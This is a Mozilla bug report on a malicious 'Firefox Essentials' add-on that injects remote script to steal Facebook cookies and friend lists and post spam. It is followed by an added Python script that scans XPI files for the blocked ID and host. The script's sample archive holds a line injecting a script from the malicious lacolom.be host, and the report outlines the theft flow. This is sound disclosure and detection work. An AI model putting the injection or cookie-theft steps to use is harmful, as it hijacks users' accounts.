Malicious "Firefox Essentials" add-on

RESOLVED FIXED

Toolkit
Blocklisting
6 years ago
a year ago

People

(Reporter: MarkH, Assigned: jorgev)

Attachments

(1 attachment)

80.69 KB, application/octet-stream
(Reporter)

Description

6 years ago
Created attachment 594822 [details]
20120206 youtube3.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7

Steps to reproduce:

Downloaded add-on from http://lacolom[.]be/fbs.xpi


Actual results:

The add-on injects JS to inject http://lacolom.be/g.js, which injects http://www.lacolom.be/oepp.php as JS.

oepp.php:

Steals your cookies
Steals your friend list via /ajax/typeahead/first_degree.php

Picks one of the following bit.ly URLs:


Posts it as a status update via /ajax/updatestatus.php, and mentions your friends.

Picks one of the following bit.ly URLs:

Posts it as an update to your timeline via /ajax/ufi/modify.php

Picks one of the following FB pages:

and has you post about it via /ajax/ufi/modify.php.



Expected results:

It shouldn't steal your cookies and post to Facebook on your behalf without your consent.
(Assignee)

Comment 1

6 years ago
ID: youtube@youtuber.com
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
(Assignee)

Comment 2

6 years ago
https://addons.mozilla.org/en-US/firefox/blocked/i63
Status: ASSIGNED → RESOLVED
Last Resolved: 6 years ago
Resolution: --- → FIXED
Product: addons.mozilla.org → Toolkit
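
Added example, not part of the bug report or of Mozilla's tooling: a triage check that looks inside an XPI for the two indicators this bug gives, the add-on ID from comment 1 and the lacolom.be host from the description. It assumes a legacy XPI layout with an `install.rdf` manifest at the archive root; `triage_xpi`, `is_bad_host` and `build_sample_xpi` are hypothetical names, and the sample archive is constructed in memory.

```python
import io
import re
import zipfile

# Indicators copied from this bug report.
BLOCKED_IDS = {"youtube@youtuber.com"}
BAD_HOSTS = {"lacolom.be"}
MAX_MEMBER = 5 * 1024 * 1024  # skip members with a large declared size

# Heuristic regexes: good enough for triage, not a full RDF or URL parser.
ID_RE = re.compile(rb"<em:id>\s*([^<\s]+)\s*</em:id>")
URL_RE = re.compile(rb"https?://([a-z0-9.-]+)", re.I)

def is_bad_host(host):
    """True for a listed host or any subdomain of it."""
    host = host.lower().rstrip(".")
    return any(host == b or host.endswith("." + b) for b in BAD_HOSTS)

def triage_xpi(data):
    """Return (blocked add-on IDs found, {member name: sorted bad hosts})."""
    ids, hits = set(), {}
    with zipfile.ZipFile(io.BytesIO(data)) as xpi:
        for info in xpi.infolist():
            if info.file_size > MAX_MEMBER:
                continue
            blob = xpi.read(info)
            if info.filename == "install.rdf":
                ids |= {m.decode() for m in ID_RE.findall(blob)}
            bad = {h.decode().lower() for h in URL_RE.findall(blob)
                   if is_bad_host(h.decode())}
            if bad:
                hits[info.filename] = sorted(bad)
    return ids & BLOCKED_IDS, hits

def build_sample_xpi():
    """Constructed sample: a minimal XPI carrying the report's indicators."""
    rdf = (b'<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" '
           b'xmlns:em="http://www.mozilla.org/2004/em-rdf#">'
           b'<Description about="urn:mozilla:install-manifest">'
           b'<em:id>youtube@youtuber.com</em:id></Description></RDF>')
    js = b'var s = document.createElement("script"); s.src = "http://lacolom.be/g.js";'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("install.rdf", rdf)
        z.writestr("content/overlay.js", js)
        z.writestr("content/clean.js", b'var home = "https://www.mozilla.org/";')
    return buf.getvalue()

if __name__ == "__main__":
    print(triage_xpi(build_sample_xpi()))
```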